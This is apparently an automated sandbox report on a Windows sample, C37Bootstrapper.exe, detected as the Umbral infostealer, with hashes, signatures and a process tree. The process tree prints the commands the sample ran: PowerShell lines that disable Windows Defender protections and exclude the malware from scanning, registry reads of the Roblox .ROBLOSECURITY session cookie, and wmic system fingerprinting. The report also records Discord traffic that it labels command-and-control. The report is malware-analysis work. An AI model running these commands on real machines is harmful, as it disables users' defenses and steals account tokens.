Analysis
max time kernel: 120s
max time network: 125s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted: 05-06-2024 16:50
Behavioral task: behavioral1
Sample: C37Bootstrapper.exe
Resource: win7-20240508-en
General
Target: C37Bootstrapper.exe
Size: 407KB
MD5: 2a25b9d935c4fe0a9f85251ecabfd923
SHA1: bebbdce90e0ba9eb1cf388f0db17dbb97775e9e2
SHA256: b5015182ecaa7561f27090fb7b2aab0decbbffc94606225b12676dc720266498
SHA512: 08f31d8e8867fcdadb209d28ad3f654b694fe5ec19a289871d758ab75d7759f08c4b8f01c789be22c2e83dafa8ec9e861479003e1e091038074471c701bf9dbf
SSDEEP: 6144:oloZMLrIkd8g+EtXHkv/iD4I7lXrRiK1AwBzOurZpjb8e1mVi4qkRH:2oZ0L+EP8I7lXrRiK1AwBzOurzr4J
Malware Config
Signatures

Detect Umbral payload (1 IoC)
  resource: behavioral1/memory/1580-1-0x0000000000A20000-0x0000000000A8C000-memory.dmp
  yara_rule: family_umbral

Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid / Process: 2764 powershell.exe

Drops file in Drivers directory (1 IoC)
  description: File opened for modification
  ioc: C:\Windows\System32\drivers\etc\hosts
  Process: C37Bootstrapper.exe

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow 7: discord.com
  flow 8: discord.com

Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 4: ip-api.com

Detects videocard installed (1 TTP, 1 IoC)
  Uses WMIC.exe to determine videocard installed.
  pid / Process: 2820 wmic.exe

Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid / Process: 1580 C37Bootstrapper.exe; 2764 powershell.exe; 2692 powershell.exe; 2940 powershell.exe; 1032 powershell.exe; 2164 powershell.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description / pid / Process:
  Token: SeDebugPrivilege / 1580 C37Bootstrapper.exe
  2680 wmic.exe (the following 20-token sequence is listed twice): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  Token: SeDebugPrivilege / 2764 powershell.exe
  Token: SeDebugPrivilege / 2692 powershell.exe
  Token: SeDebugPrivilege / 2940 powershell.exe
  Token: SeDebugPrivilege / 1032 powershell.exe
  1564 wmic.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34

Suspicious use of WriteProcessMemory (30 IoCs)
  description / pid / Process / procid_target (each entry is listed three times in the report):
  PID 1580 wrote to memory of 2680 / 1580 C37Bootstrapper.exe / 28
  PID 1580 wrote to memory of 2764 / 1580 C37Bootstrapper.exe / 31
  PID 1580 wrote to memory of 2692 / 1580 C37Bootstrapper.exe / 33
  PID 1580 wrote to memory of 2940 / 1580 C37Bootstrapper.exe / 35
  PID 1580 wrote to memory of 1032 / 1580 C37Bootstrapper.exe / 37
  PID 1580 wrote to memory of 1564 / 1580 C37Bootstrapper.exe / 39
  PID 1580 wrote to memory of 1436 / 1580 C37Bootstrapper.exe / 41
  PID 1580 wrote to memory of 276 / 1580 C37Bootstrapper.exe / 43
  PID 1580 wrote to memory of 2164 / 1580 C37Bootstrapper.exe / 45
  PID 1580 wrote to memory of 2820 / 1580 C37Bootstrapper.exe / 47
Processes

C:\Users\Admin\AppData\Local\Temp\C37Bootstrapper.exe
  command: "C:\Users\Admin\AppData\Local\Temp\C37Bootstrapper.exe"
  PID: 1580
  - Drops file in Drivers directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

    C:\Windows\System32\Wbem\wmic.exe
      command: "wmic.exe" csproduct get uuid
      PID: 2680
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\C37Bootstrapper.exe'
      PID: 2764
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      PID: 2692
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      PID: 2940
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      PID: 1032
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\Wbem\wmic.exe
      command: "wmic.exe" os get Caption
      PID: 1564
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\Wbem\wmic.exe
      command: "wmic.exe" computersystem get totalphysicalmemory
      PID: 1436

    C:\Windows\System32\Wbem\wmic.exe
      command: "wmic.exe" csproduct get uuid
      PID: 276

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      PID: 2164
      - Suspicious behavior: EnumeratesProcesses

    C:\Windows\System32\Wbem\wmic.exe
      command: "wmic" path win32_VideoController get name
      PID: 2820
      - Detects videocard installed
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7M88HCOK7OWE8BIM874W.temp
  Filesize: 7KB
  MD5: 715d99a300d29002353caf6f3c2d02b3
  SHA1: d42e755cc713feea511dfcf01fb0524677ea0aba
  SHA256: 6420d85b63fbc25d4ab3d953c1d57db8299c013f2a4c361f169c5ea733236023
  SHA512: 03973e39a7a9b48c190d7a5f3b51a2599e354802d28ed93dec4d235fa38037a59a31c91f9260f5c61152d89ba02d07912bfc1aecb060037d686e5c31cb7c6c96